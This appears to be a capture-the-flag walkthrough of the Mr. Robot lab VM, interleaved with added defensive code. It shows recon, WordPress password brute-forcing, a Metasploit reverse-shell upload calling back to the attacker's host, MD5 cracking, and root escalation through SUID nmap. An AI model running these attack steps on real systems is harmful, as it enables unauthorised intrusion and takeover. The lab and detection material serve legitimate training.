About

  1. Download link
  2. Goal: find the 3 keys
  3. Bilibili video

Information gathering

  1. Host-only networking is used, so the NIC is vmnet1 and the attacking host's IP is always in 192.168.7.1/24.
  2. nmap -T4 192.168.7.1/24 -A

kali-team@LTS:~$ nmap -T4 192.168.7.1/24 -A

Nmap scan report for 192.168.7.129
Host is up (0.00075s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (2 hosts up) scanned in 47.44 seconds

kali-team@LTS:~$ curl http://192.168.7.129/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt
  1. Found the first key [073403c8a58a1f80d943455fb30724b9] plus a dictionary; download the dictionary locally.
  2. The dictionary is large and probably has duplicates, so tidy it first: sort fsocity.dic | uniq > list.dic
  3. nikto -h http://192.168.7.129
kali-team@LTS:~/桌面$ nikto -h http://192.168.7.129
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP: 192.168.7.129
+ Target Hostname: 192.168.7.129
+ Target Port: 80
+ Start Time: 2018-06-19 20:37:10 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache
+ IP address found in the 'x-mod-pagespeed' header. The IP is "1.9.32.3".
+ Uncommon header 'x-frame-options' found, with contents: SAMEORIGIN
+ Uncommon header 'x-mod-pagespeed' found, with contents: 1.9.32.3-4523
+ Retrieved x-powered-by header: PHP/5.5.29
+ Uncommon header 'x-pingback' found, with contents: http://192.168.7.129/xmlrpc.php
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x29 0x52467010ef8ad
+ "robots.txt" retrieved but it does not contain any 'disallow' entries (which is odd).
+ OSVDB-3092: /admin/: This might be interesting...
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-3092: /readme: This might be interesting...
+ Uncommon header 'link' found, with contents: <http://192.168.7.129/?p=23>; rel=shortlink
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login/: Admin login page/section found.
+ /wordpress/: A Wordpress installation was found.
+ 6544 items checked: 0 error(s) and 16 item(s) reported on remote host
+ End Time: 2018-06-19 20:39:38 (GMT8) (148 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
  1. Do a quick scan with nikto, or scan the directories with dirsearch.
kali-team@LTS:~/桌面$ dirsearch -u http://192.168.7.129 -e * |grep 200
[20:42:35] 301 - 235B - /admin -> http://192.168.7.129/admin/
[20:42:36] 200 - 1KB - /admin/
[20:42:36] 200 - 1KB - /admin/?/login
[20:42:38] 200 - 1KB - /admin/index
[20:42:38] 200 - 1KB - /admin/index.html
[20:42:41] 301 - 0B - /admin_area/index.php -> http://192.168.7.129/admin_area/
[20:43:15] 200 - 0B - /favicon.ico
[20:43:23] 200 - 1KB - /index.html
[20:43:25] 200 - 504KB - /intro
[20:43:28] 200 - 309B - /license.txt
[20:43:50] 200 - 64B - /readme
[20:43:50] 200 - 64B - /readme.html
[20:43:51] 200 - 41B - /robots.txt
[20:43:56] 200 - 0B - /sitemap
[20:43:56] 200 - 0B - /sitemap.xml
[20:43:56] 200 - 0B - /sitemap.xml.gz
[20:44:12] 200 - 0B - /wp-content/
[20:44:12] 200 - 0B - /wp-content/plugins/google-sitemap-generator/sitemap-core.php
[20:44:12] 200 - 3KB - /wp-login
[20:44:12] 200 - 3KB - /wp-login.php
[20:44:12] 200 - 3KB - /wp-login/
  1. It is obviously WordPress, but no posts by any user are visible. Open the login page to enumerate usernames: a Baidu search for Mr. Robot shows that the protagonist of the show is called Elliot, and with that name the login page now reports a wrong password, which means the username is valid. Then brute-force it with the dictionary found earlier.
  2. wpscan -u http://192.168.7.129 --username Elliot --wordlist list.dic
[+] Enumerating plugins from passive detection ...
[+] No plugins found passively
[+] Starting the password brute forcer
[+] [SUCCESS] Login : Elliot Password : ER28-0652
Brute Forcing 'Elliot' Time: 00:01:21 <=============================================================> (5637 / 11452) 49.22% ETA: 00:01:24
+----+--------+------+-----------+
| ID | Login  | Name | Password  |
+----+--------+------+-----------+
|    | Elliot |      | ER28-0652 |
+----+--------+------+-----------+

[+] Finished: Tue Jun 19 21:22:23 2018
[+] Elapsed time: 00:01:22
[+] Requests made: 5703
[+] Memory used: 32.516 MB
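As an added example (not part of the original write-up), the defender's view of the wpscan run above: a small Python detector that parses Apache combined-format access log lines and flags a source IP that sends a burst of failed login POSTs to wp-login.php or xmlrpc.php (nikto reported the x-pingback header pointing at xmlrpc.php). The log lines, the threshold and the time window are constructed for this example; the 200-on-failure / 302-on-success pattern is standard WordPress login behaviour.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Apache combined-log sample (not from the original write-up): one
# source hammering wp-login.php with a scanner, one normal user logging in once.
SAMPLE_LOG = """\
192.168.7.1 - - [19/Jun/2018:21:21:01 +0800] "POST /wp-login.php HTTP/1.1" 200 3321 "-" "WPScan"
192.168.7.1 - - [19/Jun/2018:21:21:01 +0800] "POST /wp-login.php HTTP/1.1" 200 3321 "-" "WPScan"
192.168.7.1 - - [19/Jun/2018:21:21:02 +0800] "POST /wp-login.php HTTP/1.1" 200 3321 "-" "WPScan"
192.168.7.1 - - [19/Jun/2018:21:21:02 +0800] "POST /wp-login.php HTTP/1.1" 200 3321 "-" "WPScan"
192.168.7.1 - - [19/Jun/2018:21:21:03 +0800] "POST /wp-login.php HTTP/1.1" 200 3321 "-" "WPScan"
192.168.7.1 - - [19/Jun/2018:21:21:03 +0800] "POST /wp-login.php HTTP/1.1" 200 3321 "-" "WPScan"
192.168.7.1 - - [19/Jun/2018:21:22:23 +0800] "POST /wp-login.php HTTP/1.1" 302 0 "-" "WPScan"
192.168.7.50 - - [19/Jun/2018:21:21:05 +0800] "GET /index.html HTTP/1.1" 200 1224 "-" "Mozilla/5.0"
192.168.7.50 - - [19/Jun/2018:21:21:40 +0800] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
not a log line
"""

# Endpoints that accept WordPress credentials: the login form and XML-RPC.
LOGIN_PATHS = {"/wp-login.php", "/xmlrpc.php"}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Parse one combined-log line into (ip, timestamp, method, path, status), or None."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    path = m.group("path").split("?")[0]
    return m.group("ip"), ts, m.group("method"), path, int(m.group("status"))


def find_bruteforce(log_text, threshold=5, window_seconds=60):
    """Flag source IPs with >= threshold failed login POSTs inside any
    window_seconds window. WordPress answers a failed login with 200 (the form
    is re-rendered) and a successful one with a 302 redirect, so a 302 after a
    burst of 200s is the signature of a guess that worked."""
    posts = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, path, status = rec
        if method == "POST" and path in LOGIN_PATHS:
            posts[ip].append((ts, status))

    window = timedelta(seconds=window_seconds)
    flagged = {}
    for ip, events in posts.items():
        events.sort()
        failures = [ts for ts, status in events if status == 200]
        successes = [ts for ts, status in events if status == 302]
        start = 0
        burst = False
        # Sliding window over the failure timestamps.
        for end in range(len(failures)):
            while failures[end] - failures[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                burst = True
                break
        if burst:
            flagged[ip] = {
                "failures": len(failures),
                "success_after": any(ts > failures[-1] for ts in successes),
            }
    return flagged


if __name__ == "__main__":
    for ip, info in find_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {info['failures']} failed logins, "
              f"success afterwards: {info['success_after']}")
```

On the sample, 192.168.7.1 is flagged with six failures and a later success, while the single legitimate login from 192.168.7.50 is not. The same burst is what rate limiting or fail2ban on wp-login.php would block; the detector is the check that tells you whether that control was missing.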

GetShell

  1. The first way is the classic one: log in and edit the theme's 404 template.
  2. The second uses Metasploit; pick whichever you prefer. A big pitfall here!
msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(unix/webapp/wp_admin_shell_upload) > show options

Module options (exploit/unix/webapp/wp_admin_shell_upload):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   PASSWORD      ER28-0652        yes       The WordPress password to authenticate with
   PAYLOAD_NAME  Kali-Team        yes       Fix By Kali-Team payload_name to update with
   PLUGIN_NAME   WordPress        yes       Fix By Kali-Team plugin_name to update with
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST         192.168.7.129    yes       The target address
   RPORT         80               yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /                yes       The base path to the wordpress application
   USERNAME      Elliot           yes       The WordPress username to authenticate with
   VHOST                          no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.7.1      yes       The listen address (an interface may be specified)
   LPORT  7788             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   WordPress

msf exploit(unix/webapp/wp_admin_shell_upload) > set password ER28-0652
password => ER28-0652
msf exploit(unix/webapp/wp_admin_shell_upload) > set username Elliot
username => Elliot
msf exploit(unix/webapp/wp_admin_shell_upload) > set rhost 192.168.7.129
rhost => 192.168.7.129
msf exploit(unix/webapp/wp_admin_shell_upload) > run
[*] Started reverse TCP handler on 192.168.7.1:4444
[-] Exploit aborted due to failure: not-found: The target does not appear to be using WordPress
[*] Exploit completed, but no session was created.
  1. It errors out. Googled a fix: after it the upload works, but the shell does not call back because of the plugin path.

    /opt/metasploit-framework/embedded/framework/modules/exploits/unix/webapp/wp_admin_shell_upload.rb

    Comment out the following two lines with #:

    fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online?

    fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded

  2. Then reload the module

msf exploit(unix/webapp/wp_admin_shell_upload) > reload
[*] Reloading module...
msf exploit(unix/webapp/wp_admin_shell_upload) > run
[*] Started reverse TCP handler on 192.168.7.1:7788
[*] Authenticating with WordPress using Elliot:ER28-0652...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /wp-content/plugins/WordPress/Kali-Team.php...
[*] Sending stage (37775 bytes) to 192.168.7.129
[*] Meterpreter session 5 opened (192.168.7.1:7788 -> 192.168.7.129:36273) at 2018-06-19 23:13:10 +0800
ls
[!] This exploit may require manual cleanup of 'Kali-Team.php' on the target
[!] This exploit may require manual cleanup of 'WordPress.php' on the target
[!] This exploit may require manual cleanup of '../WordPress' on the target

Privilege escalation

  1. The second key is in the robot user's home directory, but there is no permission to read it.
meterpreter > ls
Listing: /home/robot
====================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100400/r--------  33    fil   2015-11-13 15:28:21 +0800  key-2-of-3.txt
100644/rw-r--r--  39    fil   2015-11-13 15:28:21 +0800  password.raw-md5

meterpreter > cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
  1. Crack the MD5; it should be robot's password.
  2. But su cannot be run from the reverse shell: su: must be run from a terminal
  3. Spawning a pty with Python gives an interactive shell: python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
daemon@linux:/home/robot$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz

robot@linux:~$ id
id
uid=1002(robot) gid=1002(robot) groups=1002(robot)
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
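Added example, not from the original post: why a raw-MD5 password file is as good as plaintext, and what the stored form should look like instead. md5_lookup does a single dictionary pass against the hash from password.raw-md5 (the wordlist here is a constructed stand-in for fsocity.dic); hash_password and verify_password show the salted, iterated PBKDF2 form that defeats that lookup. The function names and the iteration count are my own choices.

```python
import hashlib
import hmac
import os

# Hash from the write-up's /home/robot/password.raw-md5.
ROBOT_MD5 = "c3fcd3d76192e4007dfb496cca67e13b"

# Constructed stand-in for a real wordlist such as fsocity.dic.
WORDLIST = ["password", "123456", "robot", "mrrobot",
            "abcdefghijklmnopqrstuvwxyz", "ER28-0652"]


def md5_lookup(hex_digest, words):
    """Return the first word whose unsalted MD5 equals hex_digest, else None.
    One hash per candidate, no salt and no work factor: this is why a raw MD5
    file on disk is effectively the plaintext."""
    target = hex_digest.strip().lower()
    for word in words:
        if hashlib.md5(word.encode()).hexdigest() == target:
            return word
    return None


def hash_password(password, salt=None, iterations=200_000):
    """Store passwords with PBKDF2-HMAC-SHA256, a random 16-byte salt and a
    work factor; the record is self-describing so it can be verified later."""
    if salt is None:
        salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and iterations; compare in constant time."""
    algo, iterations, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    cracked = md5_lookup(ROBOT_MD5, WORDLIST)
    print("raw MD5 matched wordlist entry:", cracked)
    stored = hash_password(cracked)
    print("salted PBKDF2 record:", stored)
    print("verify correct password:", verify_password(cracked, stored))
    print("verify wrong password:", verify_password(cracked + "1", stored))
```

The MD5 lookup succeeds on the fourth candidate with no more cost than four hash calls; the PBKDF2 record gives a different value every time it is generated (fresh salt), so a precomputed dictionary is useless against it, and each guess costs 200,000 iterations instead of one. A file like password.raw-md5 left world-readable is the finding; the fix is both the hash format and the file permissions.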
  1. Second key found!
  2. Finally, escalate to root: look for programs with the SUID bit set.
robot@linux:/$ cd /root
cd /root
bash: cd: /root: Permission denied
robot@linux:/$ find / -perm -4000 -type f 2>/dev/null
find / -perm -4000 -type f 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
robot@linux:/$
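Added example (not the write-up's own code): an audit that takes the find output above and reports SUID files that are not in a known-good baseline, marking those under paths no package manager writes to. The baseline set and the unmanaged-path list are assumptions for the example; on a real host build the baseline from a clean image of the same release.

```python
import os
import stat

# The SUID list from the find output above, embedded so the audit runs offline;
# on a live host feed it the real `find / -perm -4000 -type f` output.
FIND_OUTPUT = """\
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
"""

# Assumed baseline: SUID binaries that the distribution's own packages install.
BASELINE_SUID = {
    "/bin/ping", "/bin/ping6", "/bin/mount", "/bin/umount", "/bin/su",
    "/usr/bin/passwd", "/usr/bin/newgrp", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/sudo", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/eject/dmcrypt-get-device", "/usr/lib/pt_chown",
    "/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper",
    "/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper",
}

# Locations no package manager writes to; a SUID file here was put there by hand.
UNMANAGED_PREFIXES = ("/usr/local/", "/opt/", "/home/", "/tmp/", "/var/tmp/", "/srv/")


def audit_suid(find_output, baseline=BASELINE_SUID):
    """Return [(path, reason)] for every SUID file that is not in the baseline."""
    findings = []
    for line in find_output.splitlines():
        path = line.strip()
        if not path or path in baseline:
            continue
        reasons = ["not in baseline"]
        if path.startswith(UNMANAGED_PREFIXES):
            reasons.append("under an unmanaged path (hand-installed)")
        findings.append((path, "; ".join(reasons)))
    return findings


def has_setuid(path):
    """Live check: True if the file at path currently carries the setuid bit."""
    return bool(os.stat(path).st_mode & stat.S_ISUID)


if __name__ == "__main__":
    for path, reason in audit_suid(FIND_OUTPUT):
        print(f"{path}: {reason}")
```

On the listing above only /usr/local/bin/nmap falls out, and it is exactly the binary the next step abuses. The remediation is to drop the bit (chmod u-s /usr/local/bin/nmap) or remove the old nmap build altogether; running the audit from cron once a baseline is recorded catches any SUID file that appears later.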
  1. Old versions of nmap have an interactive mode, and as shown above this one runs with root privileges (SUID). Put the command after ! and it runs as root.
robot@linux:/$ nmap --help
nmap --help
Nmap 3.81 Usage: nmap [Scan Type(s)] [Options] <host or net list>
Some Common Scan Types ('*' options require root privileges)
* -sS TCP SYN stealth port scan (default if privileged (root))
-sT TCP connect() port scan (default for unprivileged users)
* -sU UDP port scan
-sP ping scan (Find any reachable machines)
* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)
-sV Version scan probes open ports determining service & app names/versions
-sR RPC scan (use with other scan types)
Some Common Options (none are required, most can be combined):
* -O Use TCP/IP fingerprinting to guess remote operating system
-p <range> ports to scan. Example range: 1-1024,1080,6666,31337
-F Only scans ports listed in nmap-services
-v Verbose. Its use is recommended. Use twice for greater effect.
-P0 Don't ping hosts (needed to scan www.microsoft.com and others)
* -Ddecoy_host1,decoy2[,...] Hide scan using many decoys
-6 scans via IPv6 rather than IPv4
-T <Paranoid|Sneaky|Polite|Normal|Aggressive|Insane> General timing policy
-n/-R Never do DNS resolution/Always resolve [default: sometimes resolve]
-oN/-oX/-oG <logfile> Output normal/XML/grepable scan logs to <logfile>
-iL <inputfile> Get targets from file; Use '-' for stdin
* -S <your_IP>/-e <devicename> Specify source address or network interface
--interactive Go into interactive mode (then press h for help)
Example: nmap -v -sS -O www.my.com 192.168.0.0/16 '192.88-90.*.*'
SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND EXAMPLES
robot@linux:/$
robot@linux:/$ nmap --interactive
nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help

nmap> !id
!id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
waiting to reap child : No child processes
nmap>
Unknown command (ls) -- press h <enter> for help
nmap/> !ls
!ls
bin dev home lib lost+found mnt proc run srv tmp var
boot etc initrd.img lib64 media opt root sbin sys usr vmlinuz
waiting to reap child : No child processes
nmap> !ls /root
!ls /root
firstboot_done key-3-of-3.txt
waiting to reap child : No child processes
nmap> cat /root/key-3-of-3.txt
cat /root/key-3-of-3.txt
Unknown command (cat) -- press h <enter> for help
nmap> !cat /root/key-3-of-3.txt
!cat /root/key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
waiting to reap child : No child processes
nmap>

Easter egg

  1. Actually the credentials were handed to you already: http://192.168.7.129/license.txt
  2. It contains ZWxsaW90OkVSMjgtMDY1Mgo=
  3. Decode the base64: echo ZWxsaW90OkVSMjgtMDY1Mgo= |base64 --decode
  4. elliot:ER28-0652
